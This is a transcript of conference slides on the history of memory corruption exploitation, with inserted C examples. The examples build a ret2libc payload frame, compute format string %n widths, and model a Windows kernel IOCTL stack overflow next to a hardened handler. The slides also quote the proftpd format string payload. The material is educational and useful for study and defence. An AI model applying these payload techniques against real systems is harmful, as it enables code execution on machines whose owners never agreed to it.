
NanoSec Conference 2018 - Exploitation Era

October 10, 2018


A presentation given at NanoSec Conference 2018, held in Malaysia, on the topic "Exploitation Era".






  1. About Us
     Nafiez @zeifan - Memory corruption hacker - Fuzzing & Vulnerability Research - Lives in "paradise"
     Yeh @iamyeh - Threat Researcher at Carbon Black - Malware Reverse Engineering - Vulnerability Analysis
  2. Introduction • Real-world memory corruption exploitation (no XSS, SQLi, LFI, etc.) • Mid 90s to early 2000s: the vulnerability classes and exploitation techniques were introduced • Most vulnerability classes were first demonstrated on Linux • More Windows "in-the-wild" exploitation
  3. Continued… • Since 2014, Windows has led in software security mitigations • Exploitation techniques and vulnerability classes killed in modern OSes • Current exploitation techniques in Windows
  4. Timeline
     1988 Morris Worm
     1995 - 1997 Buffer Overflow
     1998 - 2000 Exploits Evolution
     2001 - 2003 Protections Era
     2004 - 2006 Windows Era
     2007 - 2010 Evolution of Exploits
  5. Ret-2-libc (Solar Designer, 1997) - Bypassing a non-executable (NX) stack without injecting any code: the overflow returns into code that is already in libc.
     Payload layout: BUFFER | address of system() in libc | return address used when system() returns | address of the string "/bin/sh"
     In libc: system(), ret, "/bin/sh\0"
     https://seclists.org/bugtraq/1997/Aug/63
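The frame drawn on the slide, laid out by an added example (not code from the deck). The 32-bit little-endian layout is the one Solar Designer's post describes; the addresses passed in `main()` are hypothetical and in a real attack come from the target's libc. The order matters: the word after `&system()` is what system() will return to, and only the word after that is its argument.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* 32-bit x86 ret2libc frame:
 *   [padding up to the saved EIP][&system()][return address for system()][&"/bin/sh"]
 * The overflowed RET pops &system(); system() then treats the next word as its
 * own return address and the word after that as its first argument. */
#define WORD 4u

static void put_le32(uint8_t *p, uint32_t v)
{
    p[0] = (uint8_t)v;         p[1] = (uint8_t)(v >> 8);
    p[2] = (uint8_t)(v >> 16); p[3] = (uint8_t)(v >> 24);
}

uint32_t get_le32(const uint8_t *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* dist_to_ret: bytes from the start of the overflowed buffer to the saved
 * return address (buffer size + saved EBP + alignment; found in a debugger).
 * Returns the payload length, or 0 if it does not fit in `cap`. */
size_t build_ret2libc(uint8_t *out, size_t cap, size_t dist_to_ret,
                      uint32_t system_addr, uint32_t after_system, uint32_t binsh_addr)
{
    size_t len = dist_to_ret + 3 * WORD;
    if (len > cap) return 0;
    memset(out, 'A', dist_to_ret);                        /* filler up to saved EIP */
    put_le32(out + dist_to_ret, system_addr);             /* overwrites saved EIP */
    put_le32(out + dist_to_ret + WORD, after_system);     /* system() returns here; &exit() gives a clean exit */
    put_le32(out + dist_to_ret + 2 * WORD, binsh_addr);   /* system()'s argument: pointer to "/bin/sh" */
    return len;
}

/* strcpy()-style overflows stop at the first NUL, so a NUL byte anywhere
 * before the final byte truncates the payload. Returns 1 if it would survive. */
int payload_strcpy_safe(const uint8_t *p, size_t len)
{
    for (size_t i = 0; i + 1 < len; i++)
        if (p[i] == 0) return 0;
    return 1;
}

int main(void)
{
    /* Hypothetical addresses, for illustration only. */
    uint8_t payload[128];
    size_t n = build_ret2libc(payload, sizeof payload, 76,
                              0x40058ae0u, 0x4004f2d0u, 0x4013a9a1u);
    printf("payload %zu bytes, strcpy-safe: %d\n", n, payload_strcpy_safe(payload, n));
    return 0;
}
```

If `&system()` or the other words contain a 0x00 byte in a non-final position, a strcpy()-driven overflow cannot deliver the frame as-is; that constraint is why exploits of the period hunted for NUL-free addresses or other copy primitives.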
  6. Format String - proftpd, the first publicly reported format string bug (1999)
     ftp> ls aaaXXXX%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%653300u%n
     https://seclists.org/bugtraq/1999/Sep/328
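Why the payload above ends in `%653300u%n`: `%n` stores the number of characters emitted so far, so the attacker pads a `%u` to whatever width makes that count equal the value to write, after accounting for the prefix and for every earlier `%u` (each consumes one stack word and prints a variable number of digits). The following is an added example, not code from the deck or from proftpd: the two `%u` values stand in for constructed stack contents, and the `%n` target is passed in explicitly instead of being the `XXXX` bytes read back off the stack, so it is harmless to run.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Digits needed to print v with %u. */
static int decimal_len(unsigned v)
{
    int n = 1;
    while (v >= 10) { v /= 10; n++; }
    return n;
}

/* Width for the padded %u so that %n stores exactly `target`, given the
 * characters already emitted by the prefix and by two earlier %u conversions.
 * Returns -1 when `target` is unreachable: %n only counts upward, and the
 * padded %u prints at least one digit. */
long width_for_target(unsigned target, size_t prefix_len, unsigned w1, unsigned w2)
{
    size_t before = prefix_len + (size_t)decimal_len(w1) + (size_t)decimal_len(w2);
    if (target <= before) return -1;
    return (long)(target - before);
}

/* Model of the slide's payload: prefix "aaaXXXX", %u conversions that each eat
 * a stack word, a width-controlled %u, then %n. Returns the value %n wrote,
 * or -1 if the target could not be reached. */
long run_n_write(unsigned target, unsigned w1, unsigned w2)
{
    const char prefix[] = "aaaXXXX";
    long width = width_for_target(target, sizeof prefix - 1, w1, w2);
    if (width < 0 || width > 0x7fffffff) return -1;
    size_t cap = (size_t)target + 64;            /* room for the whole padded output */
    char *out = malloc(cap);
    if (!out) return -1;
    int stored = 0;
    /* The format is a literal, so %n is accepted even with _FORTIFY_SOURCE. */
    snprintf(out, cap, "aaaXXXX%u%u%*u%n", w1, w2, (int)width, 0u, &stored);
    free(out);
    return stored;
}

int main(void)
{
    /* Constructed stack contents: the two %u print "1" and "22" (3 chars). */
    printf("%%n stored %ld (wanted 653307)\n", run_n_write(653307u, 1u, 22u));
    return 0;
}
```

The fix on the defending side is the same today as in 1999: never pass attacker-controlled data as the format argument; use `printf("%s", user)` and compile with `-Wformat -Wformat-security`.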
  7. 3rd Generation Exploitation (Halvar Flake)
     1st Generation Exploits - Simple stack smashes - Control of EIP (RET instruction) - E.g. strcpy(), gets(), sprintf() - Easy peasy
     2nd Generation Exploits - Off-by-one - E.g. strncat(), strncpy() - No direct EIP control; EBP (frame pointer) manipulation - Hard to find in nature
     3rd Generation Exploits - Format strings, heap structures - E.g. printf(), malloc(), free() - Sometimes trivial to spot - No direct register control
     https://www.blackhat.com/presentations/win-usa-02/halvarflake-winsec02.ppt
  8. Integer Overflow (Mark Dowd, Chris Spencer, Neel Mehta, Nishad Herath, Halvar Flake) - First introduced to the public as a vulnerability class
     https://slideplayer.com/slide/9244035/
  9. Win32 Device Driver (Sec-Labs) - METHOD_NEITHER IOCTL memory overwrite targeting Symantec AntiVirus
     http://www.nsfocus.net/vulndb/5247
     Exploit fragment (opening the device):
         push 0
         push 0
         @pushsz "\\.\NAVAP"                              ; open the device
         @callx CreateFileA                               ; yeah - open it!
         mov ebx,eax                                      ; EBX = DEVICE HANDLE
         cmp eax,-1                                       ; error ;/
         jne _x00                                         ; if not, jump to _x00 label
         @debug SPLOIT_TITLE,"Cannot open device ;/",IERROR
         jmp exit
  10. Defeating Heap Protection and DEP Bypass (PTSecurity) - Defeating heap protection and bypassing DEP on Windows XP SP2
     https://www.ptsecurity.com/upload/corporate/ww-en/download/defeating-xpsp2-heap-protection.pdf
  11. Double-Free Vulnerabilities (Matthew Conover)
     https://www.symantec.com/connect/blogs/double-free-vulnerabilities-part-1
     https://www.symantec.com/connect/blogs/double-free-vulnerabilities-part-2
     Before:
       freelist[n-1] @ 0x003401b8   Flink 0x003401b8   Blink 0x003401b8   (empty list: points to itself)
       freelist[n]   @ 0x003401c0   Flink 0x00341fb0   Blink 0x00341fb0
       chunk         @ 0x00341fa8   Flink 0x003401c0   Blink 0x003401c0
     After:
       freelist[n-1] same
       freelist[n]   same
       chunk         @ 0x00341fa8   Flink 0x003401bc   Blink 0x003401c4
  12. Heap Feng Shui (Alex Sotirov) - Heap Feng Shui in JavaScript, attacking the browser heap
     https://www.blackhat.com/presentations/bh-usa-07/Sotirov/Whitepaper/bh-usa-07-sotirov-WP.pdf
  13. Return-Oriented Programming (Erik Buchanan, Ryan Roemer, Stefan Savage, Hovav Shacham)
     https://www.blackhat.com/presentations/bh-usa-08/Shacham/BH_US_08_Shacham_Return_Oriented_Programming.pdf
  14. Overview • Found in 2015 via fuzzing • Responsible disclosure to the vendor (Emsisoft) • Vulnerable IOCTL 0x22e010 • Trivial to exploit: ◦ leads to a stack overflow that allows writing memory and redirecting execution
  15. Stack Overflow - Windows Kernel Exploitation Process
     01 Spawn processes
     02 Get a handle to the vulnerable device
     03 Reach the vulnerable IOCTL function
     04 Allocate a buffer holding the shellcode
     05 Craft the input buffer so that it redirects execution into the shellcode
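Steps 03 to 05 of slides 14 and 15, as an added example that is not from the deck and not the Emsisoft driver's code. No Windows API is called: the IOCTL handler's stack frame is modelled as a struct (64-byte local buffer followed by the saved return address), so the overwrite is observable and the program runs anywhere. The vulnerable handler trusts the caller-supplied input length, as the slides describe; the hardened handler beside it is the check a driver should perform on `InputBufferLength`. The shellcode address `0x00400000` is a hypothetical user-mode buffer from step 04.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define STATUS_SUCCESS             0x00000000u
#define STATUS_INVALID_BUFFER_SIZE 0xC0000206u   /* genuine NTSTATUS value */
#define LOCAL_SIZE 64u

/* Model of the handler's stack frame: the fixed-size local buffer, then the
 * return address that the handler's RET will pop. */
struct frame {
    uint8_t  local[LOCAL_SIZE];
    uint32_t saved_ret;
};

/* Vulnerable handler: copies as many bytes as the caller says it sent. */
uint32_t ioctl_vulnerable(struct frame *f, const uint8_t *in, size_t in_len)
{
    /* Cap only so this model stays in bounds; the real driver has no cap. */
    if (in_len > sizeof *f) in_len = sizeof *f;
    memcpy((uint8_t *)f, in, in_len);        /* in_len > 64 clobbers saved_ret */
    return STATUS_SUCCESS;
}

/* Hardened handler: rejects anything larger than the local buffer before copying. */
uint32_t ioctl_hardened(struct frame *f, const uint8_t *in, size_t in_len)
{
    if (in_len > sizeof f->local) return STATUS_INVALID_BUFFER_SIZE;
    memcpy(f->local, in, in_len);
    return STATUS_SUCCESS;
}

/* Step 05: 64 filler bytes, then the little-endian address of the user-mode
 * buffer holding the shellcode. NUL bytes are fine: DeviceIoControl passes an
 * explicit length, not a C string. Returns the payload length, 0 if it won't fit. */
size_t build_payload(uint8_t *out, size_t cap, uint32_t shellcode_addr)
{
    size_t len = LOCAL_SIZE + sizeof shellcode_addr;
    if (cap < len) return 0;
    memset(out, 'A', LOCAL_SIZE);
    for (unsigned i = 0; i < 4; i++)
        out[LOCAL_SIZE + i] = (uint8_t)(shellcode_addr >> (8 * i));
    return len;
}

/* Sends one crafted IOCTL to a handler on a fresh frame; returns where the
 * handler's RET would go and stores the NTSTATUS the handler returned. */
uint32_t deliver(uint32_t (*handler)(struct frame *, const uint8_t *, size_t),
                 uint32_t shellcode_addr, uint32_t *status)
{
    struct frame f = { {0}, 0xDEADBEEFu };   /* 0xDEADBEEF stands in for the legitimate return address */
    uint8_t payload[sizeof f];
    size_t n = build_payload(payload, sizeof payload, shellcode_addr);
    *status = handler(&f, payload, n);
    return f.saved_ret;
}

int main(void)
{
    uint32_t st;
    printf("vulnerable: RET -> 0x%08x (status 0x%08x)\n", deliver(ioctl_vulnerable, 0x00400000u, &st), st);
    printf("hardened:   RET -> 0x%08x (status 0x%08x)\n", deliver(ioctl_hardened,   0x00400000u, &st), st);
    return 0;
}
```

Two caveats a practitioner would check before trying this against a real driver: for METHOD_NEITHER the user buffer must also be probed (`ProbeForRead`) since the kernel never copied it, and on Windows 8 and later SMEP faults the kernel when it returns into a user-mode page, so the return address has to go to a kernel-resident ROP chain or a SMEP-disabling gadget first, which is the "hardware based mitigations and bypasses" point made later in this deck.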
  16. Past Exploitation Development
     01 Use-After-Free - A use-after-free vulnerability was found; to exploit it, the vulnerability was chained with Adobe Flash.
     02 ROP + Info Leak - Build a ROP chain from the UAF in the browser, chained through Adobe Flash; an ASLR bypass was required, obtained via an info leak.
     03 Full Code Execution - Exploitation was trivial once the chain was in place.
  17. What happened?
     Developer - Developers failed to audit legacy code, made no changes, kept using old frameworks, etc.
     Vulnerability Classes - The old vulnerability types and classes still exist.
     Patching - Patches introduced new vulnerabilities.
     Exploitation - Exploitation is getting more complex and requires a chain of vulnerabilities.

  18. Windows Memory Safety Mitigations … RFG • Virtualization-Based Security (VBS, built on Hyper-V) at kernel level (enabling ACG, CIG, RFG, CFG) • CFI
  19. Vulnerability Classes Killer
     Edge Attack Surface Reduction - Remove the legacy features Internet Explorer had.
     Memory Garbage Collection (MemGC) - Focuses on the DOM engine and turns UAF in the DOM non-exploitable.
     Type Confusion Protection - Additional checks to eliminate recurring bad casts and wrong branching on CTreePos.
     Result: stack corruption essentially eliminated, use-after-free decreased, rise of out-of-bounds, DLL planting and type confusion.
     https://www.blackhat.com/docs/us-16/materials/us-16-Weston-Windows-10-Mitigation-Improvements.pdf
  20. Current Exploitation Development
     • Use-After-Free - The vulnerability found was a use-after-free; to gain an info leak it had to be turned into a type confusion (in some cases this is not needed).
     • Type Confusion - Usually used as one link in the vulnerability chain.
     • Information Leak - Needed to bypass ASLR; this makes the exploit reliable.
     • Sandbox & Mitigation Bypass - Current Windows mitigations require multiple chained bypasses, including CFG and ACG.
     • Full Code Execution - Achieve full code execution (including remote) with all mitigations bypassed.
  21. Overview • Found via manual audit ◦ focus on Adobe Flash Player ActiveX • Responsible disclosure to the vendor (Adobe) • Integer overflow in the ActiveX control resulting in a NULL pointer ◦ Adobe failed to set the Kill Bit in the registry by default • Exploit attempt failed ◦ due to memory safety mitigations
  22. • Exploitation is much harder • Hardware-based mitigations and their bypasses • Past vulnerability classes remain • More chained types of exploitation • Software mitigation improvements • Advanced exploitation can still evade the security perimeter
  23. Intel Control-flow Enforcement Technology (CET)
     ➢ Shadow Stack (bypass?) ◦ A second stack used only for control-transfer operations ◦ Separate from the data stack; can be enabled for user mode or supervisor mode ◦ Protects return addresses and defends against ROP
     ➢ Indirect Branch Tracking (bypass?) ◦ New ENDBRANCH instruction marks the valid indirect CALL/JMP targets in the program ◦ Protects indirect (forward-edge) branches against JOP / COP
     https://software.intel.com/sites/default/files/managed/4d/2a/control-flow-enforcement-technology-preview.pdf
  24. References & Thanks • Thanks to KLKS for reviewing our slides • NanoSec crew • Haroon Meer, Black Hat USA 2010 paper on the history of memory corruption attacks ◦ https://media.blackhat.com/bh-us-10/whitepapers/Meer/BlackHat-USA-2010-Meer-History-of-Memory-Corruption-Attacks-wp.pdf • ...and the many papers we used as references :) • Ping us on Telegram (OWASP Malaysia) if you want to talk about exploitation and reverse engineering.